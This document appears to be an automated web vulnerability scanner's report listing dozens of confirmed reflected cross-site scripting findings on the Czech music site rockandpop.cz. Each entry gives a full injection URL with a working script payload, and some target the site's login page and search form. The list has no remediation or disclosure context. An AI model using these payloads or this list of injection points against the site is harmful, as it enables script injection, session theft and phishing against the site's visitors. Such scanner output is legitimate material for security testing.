- URL: http://www.rockandpop.cz/redakce/?'"--></style></script><script>alert(0x000134)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000134)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/?'"--></style></script><script>alert(0x000142)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000142)</script>
- Severity: Important
- Confirmation: Confirmed
- URL : http://www.rockandpop.cz/zpravy/zahranicni/your-demise-pripiji-na-nezavislost-s-novym-ohromujicim-ep/?'"--></style></script><script>alert(0x000168)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000168)</script>
- ImpactSeverity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/zpravy/zahranicni/metallica-se-rozpovidala-o-planovanem-3d-filmu/?'"--></style></script><script>alert(0x0001D1)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0001D1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/?'"--></style></script><script>alert(0x0001DE)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0001DE)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/my-bloody-valentine-zverejnili-po-22-letech-treti-desku/?'"--></style></script><script>alert(0x0001CE)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0001CE)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/system-of-a-down-vystoupi-v-praze/?'"--></style></script><script>alert(0x0001CB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0001CB)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/randy-blythe:-spravne-veci-se-nemohu-otocit-zady/?'"--></style></script><script>alert(0x0001F6)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0001F6)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/soutez-o-2x2-vstupenky-na-koncert-slobodne-europy-v-praze/?'"--></style></script><script>alert(0x0001F3)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0001F3)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/stone-sour-predstavuji-novou-skladbu/?'"--></style></script><script>alert(0x000219)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000219)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/stante-se-soucasti-rubriky-usi-s-asking-alexandria-a-while-she-sleeps/?'"--></style></script><script>alert(0x00021A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00021A)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/vyhrajte-2x2-vstupenky-na-ostravsky-koncert-uk-subs-a-tv-smithe/?'"--></style></script><script>alert(0x00021B)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00021B)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/koncem-mesice-vyda-vydavatelstvi-emi-jedinecne-album-soliteri/?'"--></style></script><script>alert(0x000273)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000273)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/chiki-liki-tu-a:-1000-koncertov-15-krajin-a-230-miest/?'"--></style></script><script>alert(0x00026A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00026A)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/marilyn-manson-zkolaboval-v-prubehu-koncertu/?'"--></style></script><script>alert(0x000286)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000286)</script>
- ImpactSeverity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/prazsky-vyber-zverejnil-jmena-hostu-jarniho-turne/?'"--></style></script><script>alert(0x000282)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000282)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/poznejte-obycejny-den-na-turne-prostrednictvim-noveho-videoklipu-the-ghost-inside/?'"--></style></script><script>alert(0x000292)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/monkey-business-vydaji-nove-album-a-vyjedou-na-turne/?'"--></style></script><script>alert(0x0002B7)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0002B7)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/britska-zpevacka-jessie-ware-se-tesi-na-evropske-turne/?'"--></style></script><script>alert(0x0002A9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0002A9)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/zpravy/domaci/o5-a-radecek-opici-turne-zacne-koncertem-v-primem-prenosu/?'"--></style></script><script>alert(0x0002B8)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0002B8)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/americti-confide-se-hlasi-ze-studia-a-pridavaji-ochutnavku/?'"--></style></script><script>alert(0x0002C8)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0002C8)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/bruno-mars-predstavuje-klip-k-singlu-when-i-was-your-man/?'"--></style></script><script>alert(0x0002D4)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0002D4)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/young-guns-your-demise-criminal-colection-9-11-rock-cafe-praha/?'"--></style></script><script>alert(0x00031F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00031F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/?'"--></style></script><script>alert(0x000352)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000352)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/tribal-theory-funky-rock-n-roll-ze-zapadnich-cech/?'"--></style></script><script>alert(0x000360)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000360)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/rock-pop-tv-jiz-brzy/?'"--></style></script><script>alert(0x000387)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000387)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/overhype-nadejna-kapela-z-brna/?'"--></style></script><script>alert(0x000374)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000374)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/branit-ve-cteni-casopisu-rock-pop-se-nevyplaci/?'"--></style></script><script>alert(0x0003B5)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0003B5)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/green-day-uno-dos-tre/?'"--></style></script><script>alert(0x0003E7)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0003E7)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/20-narozeniny-s-rock-pop-a-imodium/?'"--></style></script><script>alert(0x0003D5)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0003D5)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/rozhovory/?'"--></style></script><script>alert(0x0003F3)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0003F3)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/blink-182-dogs-eating-dogs/?'"--></style></script><script>alert(0x0003E1)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0003E1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/tribal-theory-call-me-closer/?'"--></style></script><script>alert(0x0003ED)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0003ED)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/rozhovory/paul-banks:-ztotoznuji-se-s-pristupem-davida-lynche/?'"--></style></script><script>alert(0x000404)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000404)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/rozhovory/honza-homola-wohnout-:-muzika-z-kuchyne-i-zvuky-z-kozojedske-zahrady-a-orientu/?'"--></style></script><script>alert(0x000426)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000426)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/tashi-tomas-erml/?'"--></style></script><script>alert(0x000463)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000463)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/jak-to-slysi-parkway-drive/?'"--></style></script><script>alert(0x00044C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00044C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/7526-cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?'"--></style></script><script>alert(0x000483)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000483)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/muj-report/?'"--></style></script><script>alert(0x00048B)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00048B)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/fotky/?'"--></style></script><script>alert(0x000493)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000493)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/fotky/upload/?'"--></style></script><script>alert(0x000499)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000499)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/7032-parkway-drive-predvedli-v-praze-australskou-saunu/?'"--></style></script><script>alert(0x0004C0)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0004C0)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/?'"--></style></script><script>alert(0x0004C2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0004C2)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6935-muse-everything-everything-22-11-2012-praha-o2-arena/?'"--></style></script><script>alert(0x000502)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000502)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6909-into-darkness-tour-2012/?'"--></style></script><script>alert(0x00050A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00050A)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6566-serj-tankian-rozeskakal-lucernu/?'"--></style></script><script>alert(0x000511)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000511)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6564-niceland-michal-hruza-kapela-hruzy-andel-music-bar-plzen-24-10-2012/?'"--></style></script><script>alert(0x000520)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000520)</script>
- ImpactSeverity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6545-fotky-z-koncertu-lionela-richieho/?'"--></style></script><script>alert(0x00052C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00052C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/festivaly/?'"--></style></script><script>alert(0x00052E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00052E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/festivaly/2012/?'"--></style></script><script>alert(0x000533)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000533)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/casopis/rock-pop-2-13/?'"--></style></script><script>alert(0x00053C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00053C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/mapa-stranek/?'"--></style></script><script>alert(0x000546)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000546)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/newsletter/?'"--></style></script><script>alert(0x00055A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00055A)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/hledani/?'"--></style></script><script>alert(0x00058C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00058C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/hledani/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: q
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000590)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/silverstein-lakaji-svym-nejnovejsim-videoklipem-na-aktualni-desku/?'"--></style></script><script>alert(0x0005B0)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0005B0)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/cenu-hudebnich-kritiku-apollo-2012-ziskal-boris-carloff/?'"--></style></script><script>alert(0x0005B4)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0005B4)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/p-nk-predstavuje-novy-videoklip-s-hvezdnym-hostem/?'"--></style></script><script>alert(0x0005B3)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0005B3)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/?page='"--></style></script><script>alert(0x0005E2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0005E2)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/underwood/login.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/underwood/login.php?request='"--></style></script><script>alert(0x000602)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: request
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000602)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/jarni-turne-the-prostitutes-zavrsi-rok-od-vydani-uspesneho-alba/?'"--></style></script><script>alert(0x00060C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00060C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/nove-video-in-due-time-od-killswitch-engage/?'"--></style></script><script>alert(0x00060D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00060D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/tiskove-zpravy/?'"--></style></script><script>alert(0x000640)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000640)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/hledani/?'"--></style></script><script>alert(0x000657)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000657)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/stone-sour-house-of-gold-bones-pt-1/?'"--></style></script><script>alert(0x0006F1)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0006F1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/underwood/login.php?request='"--></style></script><script>alert(0x0006F0)</script>&uwLanguage=cz
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: request
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0006F0)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/sister-sin-now-and-forever/?'"--></style></script><script>alert(0x0006F2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0006F2)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/pipes-and-pints-found-and-lost/?'"--></style></script><script>alert(0x000711)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000711)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/punk-goes-pop-5/?'"--></style></script><script>alert(0x00070D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00070D)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/recenze/?page='"--></style></script><script>alert(0x000719)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000719)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/recenze/please-the-trees-a-forest-affair/?'"--></style></script><script>alert(0x00072D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00072D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/devil-sold-his-soul-empire-of-light/?'"--></style></script><script>alert(0x000732)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000732)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/yellowcard-southern-air/?'"--></style></script><script>alert(0x000746)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000746)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/whitechapel-whitechapel/?'"--></style></script><script>alert(0x000747)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000747)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/recenze/dvd/?'"--></style></script><script>alert(0x000765)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000765)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/recenze/hledani/?'"--></style></script><script>alert(0x00078E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00078E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/stitky/autori/?'"--></style></script><script>alert(0x00079A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00079A)</script>
- Severity: Important
